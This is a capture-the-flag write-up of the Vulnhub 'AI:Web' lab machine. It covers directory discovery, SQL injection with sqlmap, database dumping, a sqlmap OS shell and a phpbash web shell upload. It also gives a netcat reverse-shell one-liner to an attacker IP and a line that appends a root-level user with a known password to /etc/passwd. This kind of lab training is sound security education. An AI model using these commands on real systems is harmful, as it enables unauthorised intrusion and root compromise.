Vulnhub - AI:Web writeup
Author: Mohammad Ariful Islam
There is only single port open and that too have some hidden directories. Let’s see what else we can find from HTTP service.
When we visit the website we get a message
Not even Google search my contents!
That message is reference to
robots.txt because that is the file use to allow or disallow google from scraping.
robots.txt we have 2 entries
But When I tried visiting
/se3reTdir777/uploads/ I got
403 Forbidden error, meaning I cannot view the content of those page.
I ran dirsearch on
/m3diNf0/ and found
If we open that
info.php it contains simple information about the system.
But when I opened the
http://192.168.184.135/se3reTdir777/ I got a very basic form asking me about
I started to submit id as
When I submitted UserId as
4 I got error.
I tested this field for SQLi with
sqlmap. I captured the requests and saved it in a file named
sql.txt and then passed that file to sqlmap.
➜ sqlmap -r /home/mzfr/sql.txt --dbs
➜ sqlmap -r /home/mzfr/sql.txt -D aiweb1 --tables
➜ sqlmap -r /home/mzfr/sql.txt -D aiweb1 --dump
Since all the hashes are just base64 encoded so I decoded them and only one of them was legit.
but since there is no service to login we can’t use this.
I found out that we can use
--os-shell with sqlmap to get the shell.
sqlmap -r /home/mzfr/sql.txt -D aiweb1 --os-shell and then selected following options:
I figured out that custom path from the
info.php we found in the starting.
And with that I got the shell.
From this I uploaded a
phpbash shell using
Now we can visit
se3reTdir777/uploads/phpbash.php and we’ll have a phpbash shell.
So Now from this shell I ran
$ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.184.1 4444 >/tmp/f
I downloaded the enumeration script and ran it and I found out that there are two users
find / -user www-data -type f 2>/dev/null and found that
www-data can edit
/etc/passwd which is nice.
echo "toor:sXuCKi7k3Xh/s:0:0::/root:/bin/bash" >> /etc/passwd this will add a new user named
toor with password
su to toor and got the root-shell.
now get the flag from the root directory.
This was an awesome machine with something new for me. I didn’t knew that we can use sqlmap for getting a shell.
Thanks to @arif_xpress for making this machine.
Thanks for reading, Feedback is always appreciated.
Follow me @0xmzfr for more “Writeups”.